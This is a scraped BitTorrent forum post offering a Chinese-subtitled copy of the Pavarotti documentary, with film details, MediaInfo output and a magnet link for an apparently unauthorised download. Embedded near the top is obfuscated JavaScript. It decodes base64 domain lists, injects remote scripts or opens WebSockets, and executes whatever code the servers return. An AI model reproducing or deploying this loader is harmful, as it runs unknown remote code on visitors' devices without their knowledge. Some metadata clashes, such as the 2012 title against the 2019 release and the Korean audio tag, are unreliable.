帕瓦罗蒂[中文字幕]My.Pavarotti.2012.1080p.WEB-DL.H265.AAC-xiaopie-迅雷下载 3.92GB

版主小s 18天前 138

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 帕瓦罗蒂 / 巴伐洛堤: 歌剧人生(港) / 帕华洛帝:世纪男高音(台) / 帕瓦罗蒂·一声为爱

◎片 名 Pavarotti

◎年 代 2019

◎产 地 英国 / 美国

◎类 别 纪录片 / 音乐 / 传记

◎语 言 英语

◎上映日期 2019-06-07(美国)

◎IMDb评分 7.5/10 from 2565 users

◎IMDb链接 https://www.imdb.com/title/tt6964076

◎豆瓣评分 8.3/10 from 1633 users

◎豆瓣链接 https://movie.douban.com/subject/27060483/

◎片 长 115分钟

◎导 演 朗·霍华德 Ron Howard

◎编 剧 马克·蒙雷 Mark Monroe

◎主 演 卢奇亚诺·帕瓦罗蒂 Luciano Pavarotti

何塞·卡雷拉斯 José Carreras

普拉西多·多明戈 Plácido Domingo

祖宾·梅塔 Zubin Mehta

戴安娜王妃 Princess Diana

斯派克·李 Spike Lee

斯蒂夫·旺达 Stevie Wonder

科菲·安南 Kofi Annan

纳尔逊·曼德拉 Nelson Mandela

琼·萨瑟兰 Joan Sutherland

菲尔·多纳休 Phil Donahue

博诺 Bono

Nicoletta Mantovani

Clive James

Russell Harty

Harvey Goldsmith

Tibor Rudas

郎朗 Lang Lang

◎标 签 纪录片 | 传记 | 音乐 | 2019 | 美国 | 男高音 | 伟大的帕瓦罗蒂 | 帕瓦罗蒂

◎简 介

在世界著名男高音鲁契亚诺·帕瓦罗蒂逝世十周年之际,一部官方授权纪录片宣布立项,由好莱坞著名导演朗·霍华德执导。帕瓦罗蒂1935年出生,2007年因癌症去世,这部未命名纪录片的拍摄将会得到包括帕瓦罗蒂遗产委员会、环球音乐以及Decca唱片等相关部门的全力支持与合作。该片还未确定上映时间。作为好莱坞大导演,人物传记片是朗·霍华德最擅长的类型片之一。

  1. General

  2. Unique ID : 33211736800929386215867247506258453036 (0x18FC590C1B9EB391972A7EAE9A1CE22C)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 3.92 GiB

  7. Duration : 2 h 3 min

  8. Overall bit rate : 4 546 kb/s

  9. Encoded date : UTC 2021-07-08 05:18:56

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@High

  17. Codec ID : V_MPEGH/ISO/HEVC

  18. Duration : 2 h 3 min

  19. Bit rate : 4 419 kb/s

  20. Width : 1 920 pixels

  21. Height : 816 pixels

  22. Display aspect ratio : 2.35:1

  23. Frame rate mode : Constant

  24. Frame rate : 24.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.118

  29. Stream size : 3.81 GiB (97%)

  30. Default : Yes

  31. Forced : No


  32. Audio

  33. ID : 2

  34. Format : AAC LC

  35. Format/Info : Advanced Audio Codec Low Complexity

  36. Codec ID : A_AAC-2

  37. Duration : 2 h 3 min

  38. Bit rate : 124 kb/s

  39. Channel(s) : 2 channels

  40. Channel layout : L R

  41. Sampling rate : 44.1 kHz

  42. Frame rate : 43.066 FPS (1024 SPF)

  43. Compression mode : Lossy

  44. Stream size : 110 MiB (3%)

  45. Language : Korean

  46. Default : Yes

  47. Forced : No


  48. Text #1

  49. ID : 3

  50. Format : UTF-8

  51. Codec ID : S_TEXT/UTF8

  52. Codec ID/Info : UTF-8 Plain Text

  53. Duration : 2 h 0 min

  54. Bit rate : 39 b/s

  55. Count of elements : 1599

  56. Stream size : 34.6 KiB (0%)

  57. Title : Chinese Simplified

  58. Language : Chinese

  59. Default : Yes

  60. Forced : No


  61. Text #2

  62. ID : 4

  63. Format : UTF-8

  64. Codec ID : S_TEXT/UTF8

  65. Codec ID/Info : UTF-8 Plain Text

  66. Duration : 2 h 0 min

  67. Bit rate : 39 b/s

  68. Count of elements : 1599

  69. Stream size : 34.6 KiB (0%)

  70. Title : Chinese Traditional

  71. Language : Chinese

  72. Default : No

  73. Forced : No


  74. Text #3

  75. ID : 5

  76. Format : UTF-8

  77. Codec ID : S_TEXT/UTF8

  78. Codec ID/Info : UTF-8 Plain Text

  79. Duration : 2 h 0 min

  80. Bit rate : 43 b/s

  81. Count of elements : 1598

  82. Stream size : 38.1 KiB (0%)

  83. Title : English

  84. Language : English

  85. Default : No

  86. Forced : No


TAGS 纪录片 传记 音乐

磁力链:
  • magnet:?xt=urn:btih:611CD0D1EADED7B5CEEFBD8B2E015FAEE9E34F33
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回